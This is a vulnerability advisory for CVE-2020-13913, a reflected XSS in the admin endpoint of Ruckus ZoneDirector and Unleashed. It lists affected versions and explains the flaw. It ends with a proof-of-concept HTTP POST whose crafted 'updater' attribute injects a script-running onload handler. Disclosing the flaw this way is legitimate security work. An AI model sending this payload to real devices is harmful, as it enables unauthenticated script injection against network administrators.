<--

XSS in /admin/_wla_cmdstat.jsp

Aleph Research Advisory

Identifier

CVE-2020-13913

Severity

Moderate

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Technical Details

An XSS issue in emfd executable in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to execute JavaScript code via an unauthenticated crafted HTTP request. Every ajax request to “/admin/_wla_cmdstat.jsp” has to contain an “updater” attribute. The response reflected this value in the ajax response as an “id” attribute.

Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.

Proof Of Concept

POST /admin/_wla_cmdstat.jsp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

<ajax-request action='docmd' updater='">
<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>
<!--' comp='system'>
<xcmd cmd='get-security-email-hint'/>
</ajax-request>

Timeline

Posts

Credit

External References

  1. Ruckus Networks - Security Advisory ID 20200615 - txt
  2. Ruckus Networks - Security Advisory ID 20200615 - PDF